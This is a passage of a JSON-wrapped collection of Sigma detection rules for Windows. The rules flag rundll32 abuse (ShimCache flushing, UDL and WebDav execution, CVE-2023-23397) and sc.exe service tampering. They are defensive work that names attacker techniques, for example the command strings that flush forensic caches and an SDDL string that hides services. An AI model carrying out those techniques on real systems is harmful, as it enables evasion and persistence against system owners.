'\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\msxsl.exe'\n            - '\\odbcconf.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: all of selection_parent_* and 1 of selection_susp_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml",
    "content": "title: ShimCache Flush\nid: b0524451-19af-4efa-a46f-562a977f792e\nstatus: stable\ndescription: Detects actions that clear the local ShimCache and remove forensic evidence\nreferences:\n    - https://medium.com/@blueteamops/shimcache-flush-89daff28d15e\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1a:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'apphelp.dll'\n    selection1b:\n        CommandLine|contains:\n            - 'ShimFlushCache'\n            - '#250'\n    selection2a:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - 'kernel32.dll'\n    selection2b:\n        CommandLine|contains:\n            - 'BaseFlushAppcompatCache'\n            - '#46'\n    condition: ( selection1a and selection1b ) or ( selection2a and selection2b )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_sys.yml",
    "content": "title: Suspicious Rundll32 Activity Invoking Sys File\nid: 731231b9-0b5d-4219-94dd-abb6959aa7ea\nstatus: test\ndescription: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-05\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains: 'rundll32.exe'\n    selection2:\n        CommandLine|contains:\n            - '.sys,'\n            - '.sys '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_udl_exec.yml",
    "content": "title: Potentially Suspicious Rundll32.EXE Execution of UDL File\nid: 0ea52357-cd59-4340-9981-c46c7e900428\nstatus: test\ndescription: |\n    Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.\n    Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.\nreferences:\n    - https://trustedsec.com/blog/oops-i-udld-it-again\nauthor: '@kostastsale'\ndate: 2024-08-16\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1218.011\n    - attack.t1071\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\explorer.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'oledb32.dll'\n            - ',OpenDSLFile '\n            - '\\\\Users\\\\*\\\\Downloads\\\\' # Note: You can adjust the path to the download directory or other directories according to your environment.\n        CommandLine|endswith: '.udl'\n    condition: all of selection_*\nfalsepositives:\n    - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml",
    "content": "title: Rundll32 UNC Path Execution\nid: 5cdb711b-5740-4fb2-ba88-f7945027afac\nstatus: test\ndescription: Detects rundll32 execution where the DLL is located on a remote location (share)\nreferences:\n    - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-10\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n        - CommandLine|contains: 'rundll32'\n    selection_cli:\n        CommandLine|contains: ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml",
    "content": "title: Rundll32 Execution With Uncommon DLL Extension\nid: c3a99af4-35a9-4668-879e-c09aeb4f2bdf\nstatus: test\ndescription: Detects the execution of rundll32 with a command line that doesn't contain a common extension\nreferences:\n    - https://twitter.com/mrd0x/status/1481630810495139841?s=12\nauthor: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou\ndate: 2022-01-13\nmodified: 2024-04-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    filter_main_null:\n        CommandLine: null\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_known_extension:\n        - CommandLine|contains:\n              # Note: This aims to cover: single and double quotes in addition to spaces and comma \",\" usage.\n              - '.cpl '\n              - '.cpl,'\n              - '.cpl\"'\n              - \".cpl'\"\n              - '.dll '\n              - '.dll,'\n              - '.dll\"'\n              - \".dll'\"\n              - '.inf '\n              - '.inf,'\n              - '.inf\"'\n              - \".inf'\"\n        - CommandLine|endswith:\n              # Note: This aims to cover: single and double quotes in addition to spaces and comma \",\" usage.\n              - '.cpl'\n              - '.dll'\n              - '.inf'\n    filter_main_localserver:\n        CommandLine|contains: ' -localserver '\n    filter_main_zzzzInvokeManagedCustomActionOutOfProc:\n        ParentImage|endswith: '\\msiexec.exe'\n        CommandLine|contains|all:\n            - ':\\Windows\\Installer\\'\n            - '.tmp'\n            - 'zzzzInvokeManagedCustomActionOutOfProc'\n    filter_optional_EdgeUpdate:\n        ParentCommandLine|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{'\n            - '\\EDGEMITMP_'\n            - '.tmp\\setup.exe'\n            - '--install-archive='\n            - '--previous-version='\n            - '--msedgewebview --verbose-logging --do-not-launch-msedge --user-level'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml",
    "content": "title: Suspicious Workstation Locking via Rundll32\nid: 3b5b0213-0460-4e3f-8937-3abf98ff7dcc\nstatus: test\ndescription: Detects a suspicious call to the user32.dll function that locks the user workstation\nreferences:\n    - https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/\nauthor: frack113\ndate: 2022-06-04\nmodified: 2023-02-09\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_call_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_call_parent:\n        ParentImage|endswith: '\\cmd.exe'\n    selection_call_cli:\n        CommandLine|contains: 'user32.dll,'\n    selection_function:\n        CommandLine|contains: 'LockWorkStation'\n    condition: all of selection_*\nfalsepositives:\n    - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml",
    "content": "title: WebDav Client Execution Via Rundll32.EXE\nid: 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5\nstatus: test\ndescription: |\n    Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like \"C:\\windows\\system32\\davclnt.dll,DavSetCookie\".\n    This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/17\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\svchost.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains: 'C:\\windows\\system32\\davclnt.dll,DavSetCookie'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml",
    "content": "title: Suspicious WebDav Client Execution Via Rundll32.EXE\nid: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555\nstatus: test\ndescription: |\n    Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\nreferences:\n    - https://twitter.com/aceresponder/status/1636116096506818562\n    - https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/\n    - https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/\n    - https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png\n    - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2023-03-16\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - cve.2023-23397\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        ParentCommandLine|contains: '-s WebClient'\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'C:\\windows\\system32\\davclnt.dll,DavSetCookie'\n        CommandLine|re: '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'\n    filter_local_ips:\n        CommandLine|contains:\n            - '://10.' # 10.0.0.0/8\n            - '://192.168.' # 192.168.0.0/16\n            - '://172.16.' # 172.16.0.0/12\n            - '://172.17.'\n            - '://172.18.'\n            - '://172.19.'\n            - '://172.20.'\n            - '://172.21.'\n            - '://172.22.'\n            - '://172.23.'\n            - '://172.24.'\n            - '://172.25.'\n            - '://172.26.'\n            - '://172.27.'\n            - '://172.28.'\n            - '://172.29.'\n            - '://172.30.'\n            - '://172.31.'\n            - '://127.' # 127.0.0.0/8\n            - '://169.254.' # 169.254.0.0/16\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml",
    "content": "title: Rundll32 Execution Without Parameters\nid: 5bb68627-3198-40ca-b458-49f973db8752\nstatus: test\ndescription: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module\nreferences:\n    - https://bczyz1.github.io/2021/01/30/psexec.html\nauthor: Bartlomiej Czyz, Relativity\ndate: 2021-01-31\nmodified: 2023-02-28\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1570\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine:\n            - 'rundll32.exe'\n            - 'rundll32'\n    condition: selection\nfalsepositives:\n    - False positives may occur if a user called rundll32 from CLI with no options\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_runonce_execution.yml",
    "content": "title: Run Once Task Execution as Configured in Registry\nid: 198effb6-6c98-4d0c-9ea3-451fa143c45c\nstatus: test\ndescription: This rule detects the execution of Run Once task as configured in the registry\nreferences:\n    - https://twitter.com/pabraeken/status/990717080805789697\n    - https://lolbas-project.github.io/lolbas/Binaries/Runonce/\n    - https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA\nauthor: 'Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)'\ndate: 2020-10-18\nmodified: 2022-12-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\runonce.exe'\n        - Description: 'Run Once Wrapper'\n    selection_cli:\n        - CommandLine|contains: '/AlternateShellStartup'\n        - CommandLine|endswith: '/r'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml",
    "content": "title: Possible Privilege Escalation via Weak Service Permissions\nid: d937b75f-a665-4480-88a5-2f20e9f9b22a\nstatus: test\ndescription: Detects the sc.exe utility being spawned by a user with Medium integrity level to change the ImagePath or FailureCommand of a service\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://pentestlab.blog/2017/03/30/weak-service-permissions/\nauthor: Teymur Kheirkhabarov\ndate: 2019-10-26\nmodified: 2024-12-01\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    scbynonadmin:\n        Image|endswith: '\\sc.exe'\n        IntegrityLevel:\n            - 'Medium'\n            - 'S-1-16-8192'\n    selection_binpath:\n        CommandLine|contains|all:\n            - 'config'\n            - 'binPath'\n    selection_failure:\n        CommandLine|contains|all:\n            - 'failure'\n            - 'command'\n    condition: scbynonadmin and 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_create_service.yml",
    "content": "title: New Service Creation Using Sc.EXE\nid: 85ff530b-261d-48c6-a441-facaa2e81e48\nrelated:\n    - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 # Using PowerShell\n      type: similar\nstatus: test\ndescription: Detects the creation of a new service using the \"sc.exe\" utility.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2023-02-20\nmodified: 2025-09-01\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'create'\n            - 'binPath'\n    filter_optional_dropbox:\n        ParentImage|startswith:\n            - 'C:\\Program Files (x86)\\Dropbox\\Client\\'\n            - 'C:\\Program Files\\Dropbox\\Client\\'\n        ParentImage|endswith: '\\Dropbox.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administrator or user creates a service for legitimate reasons.\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_disable_service.yml",
    "content": "title: Service StartupType Change Via Sc.EXE\nid: 85c312b7-f44d-4a51-a024-d671c40b49fc\nstatus: test\ndescription: Detects the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"\nreferences:\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-03-04\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' config '\n            - 'start'\n        CommandLine|contains:\n            - 'disabled'\n            - 'demand'\n    condition: all of selection_*\nfalsepositives:\n    - False positives may occur with troubleshooting scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml",
    "content": "title: New Kernel Driver Via SC.EXE\nid: 431a1fdb-4799-4f3b-91c3-a683b003fc49\nstatus: test\ndescription: Detects creation of a new service (kernel driver) with the type \"kernel\"\nreferences:\n    - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-14\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains:\n            - 'create'\n            - 'config'\n        CommandLine|contains|all:\n            - 'binPath'\n            - 'type'\n            - 'kernel'\n    filter_optional_avira_driver:\n        - CommandLine|contains|all:\n              - 'create netprotection_network_filter'\n              - 'type= kernel start= '\n              - 'binPath= System32\\drivers\\netprotection_network_filter'\n              - 'DisplayName= netprotection_network_filter'\n              - 'group= PNP_TDI tag= yes'\n        - CommandLine|contains|all:\n              - 'create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys'\n              - 'type=kernel start=boot error=critical group=Early-Launch'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Rare legitimate installation of kernel drivers via sc.exe\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml",
    "content": "title: Interesting Service Enumeration Via Sc.EXE\nid: e83e8899-c9b2-483b-b355-5decc942b959\nstatus: test\ndescription: |\n    Detects the enumeration and query of interesting and in some cases sensitive services on the system via \"sc.exe\".\n    Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.\nreferences:\n    - https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\n    - https://pentestlab.blog/tag/svchost/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-02-12\ntags:\n    - attack.t1003\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: 'query'\n    selection_cmd:\n        # Note: add more interesting services\n        CommandLine|contains: 'termservice'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\n# Note: can be upgraded to medium after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml",
    "content": "title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE\nid: 6c8fbee5-dee8-49bc-851d-c3142d02aa47\nrelated:\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Generic SD tampering\n      type: similar\nstatus: test\ndescription: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.\nreferences:\n    - https://twitter.com/0gtweet/status/1628720819537936386\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_sdset:\n        CommandLine|contains|all:\n            - 'sdset'\n            - 'A;' # Allow Access\n    selection_trustee:\n        CommandLine|contains:\n            - ';IU' # Interactively logged-on user\n            - ';SU' # Service logon user\n            - ';BA' # Built-in administrators\n            - ';SY' # Local system\n            - ';WD' # Everyone\n    filter_optional_hexnode:\n        ParentImage: 'C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml",
    "content": "title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE\nid: 99cf1e02-00fb-4c0d-8375-563f978dfd37\nrelated:\n    - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering\n      type: similar\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique\n      type: similar\nstatus: test\ndescription: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.\nreferences:\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings\nauthor: Jonhnathan Ribeiro, oscd.community\ndate: 2020-10-16\nmodified: 2023-02-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_sdset:\n        CommandLine|contains|all:\n            - 'sdset'\n            - 'D;' # Deny Access\n    selection_trustee:\n        CommandLine|contains:\n            - ';IU' # Interactively logged-on user\n            - ';SU' # Service logon user\n            - ';BA' # Built-in administrators\n            - ';SY' # Local system\n            - ';WD' # Everyone\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml",
    "content": "title: Service DACL Abuse To Hide Services Via Sc.EXE\nid: a537cfc3-4297-4789-92b5-345bfd845ad0\nrelated:\n    - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access\n      type: similar\n    - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering\n      type: similar\nstatus: test\ndescription: Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.\nreferences:\n    - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-12-20\nmodified: 2022-08-08\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'sdset'\n            # Summary of permissions\n            #   DC: Delete All Child Objects\n            #   LC: List Contents\n            #   WP: Write All Properties\n            #   DT: Delete Subtree\n            #   SD: Delete\n            - 'DCLCWPDTSD'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml",
    "content": "title: Service Security Descriptor Tampering Via Sc.EXE\nid: 98c5aeef-32d5-492f-b174-64a691896d25\nrelated:\n    - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access\n      type: similar\n    - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique\n      type: similar\nstatus: test\ndescription: Detection of sc.exe utility adding a new service with special permission which hides that service.\nreferences:\n    - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html\n    - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/\n    - https://twitter.com/Alh4zr3d/status/1580925761996828672\n    - https://twitter.com/0gtweet/status/1628720819537936386\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sc.exe'\n        - OriginalFileName: 'sc.exe'\n    selection_cli:\n        CommandLine|contains: 'sdset'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml",
    "content": "title: Suspicious Service Path Modification\nid: 138d3531-8793-4f50-a2cd-f291b2863d78\nstatus: test\ndescription: Detects service path modification via the \"sc\" binary to a suspicious command or path\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nauthor: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-21\nmodified: 2022-11-18\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'config'\n            - 'binPath'\n        CommandLine|contains:\n            # Add more suspicious commands or binaries\n            - 'powershell'\n            - 'cmd '\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'rundll32'\n            - 'svchost'\n            - 'dllhost'\n            - 'cmd.exe /c'\n            - 'cmd.exe /k'\n            - 'cmd.exe /r'\n            - 'cmd /c'\n            - 'cmd /k'\n            - 'cmd /r'\n            # Add more suspicious paths\n            - 'C:\\Users\\Public'\n            - '\\Downloads\\'\n            - '\\Desktop\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - 'C:\\Windows\\TEMP\\'\n            - '\\AppData\\Local\\Temp'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml",
    "content": "title: Potential Persistence Attempt Via Existing Service Tampering\nid: 38879043-7e1e-47a9-8d46-6bec88e201df\nstatus: test\ndescription: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.\nreferences:\n    - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/\nauthor: Sreeman\ndate: 2020-09-29\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1543.003\n    - attack.t1574.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        - CommandLine|contains|all:\n              - 'sc '\n              - 'config '\n              - 'binpath='\n        - CommandLine|contains|all:\n              - 'sc '\n              - 'failure'\n              - 'command='\n    selection_reg_img:\n        - CommandLine|contains|all:\n              - 'reg '\n              - 'add '\n              - 'FailureCommand'\n        - CommandLine|contains|all:\n              - 'reg '\n              - 'add '\n              - 'ImagePath'\n    selection_reg_ext:\n        CommandLine|contains:\n            - '.sh'\n            - '.exe'\n            - '.dll'\n            - '.bin$'\n            - '.bat'\n            - '.cmd'\n            - '.js'\n            - '.msh$'\n            - '.reg$'\n            - '.scr'\n            - '.ps'\n            - '.vb'\n            - '.jar'\n            - '.pl'\n    condition: selection_sc or all of selection_reg_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sc_stop_service.yml",
    "content": "title: Stop Windows Service Via Sc.EXE\nid: 81bcb81b-5b1f-474b-b373-52c871aaa7b1\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\nstatus: test\ndescription: Detects the stopping of a Windows service via the \"sc.exe\" utility\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11)\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-05\nmodified: 2024-01-18\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'sc.exe'\n        - Image|endswith: '\\sc.exe'\n    selection_cli:\n        CommandLine|contains: ' stop '\n    condition: all of selection_*\nfalsepositives:\n    - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml",
